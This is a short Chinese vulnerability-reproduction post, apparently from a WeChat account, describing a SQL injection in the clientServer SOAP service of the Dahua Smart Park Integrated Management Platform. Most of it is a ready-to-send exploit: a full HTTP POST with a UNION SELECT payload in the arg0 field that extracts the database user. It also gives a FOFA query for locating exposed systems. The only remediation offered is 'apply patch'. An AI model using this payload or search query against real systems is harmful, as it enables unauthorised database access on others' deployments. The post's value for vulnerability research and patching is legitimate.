1. 大华智慧园区综合管理平台简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
大华智慧园区综合管理平台
2.漏洞描述
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
大华智慧园区综合管理平台
4.fofa查询语句
app="dahua-智慧园区综合管理平台"
5.漏洞复现
漏洞链接:https://127.0.0.1/portal/services/clientServer
漏洞数据包:
POST /portal/services/clientServer HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 421
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,user()-- -</arg0>
<!--type: long-->
<arg1>10</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soap:Envelope>
执行user()函数
执行md5(1)
7.整改意见
打补丁
原文始发于微信公众号(南风漏洞复现文库):大华智慧园区综合管理平台clientServer存在SQL注入漏洞 附POC软件
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论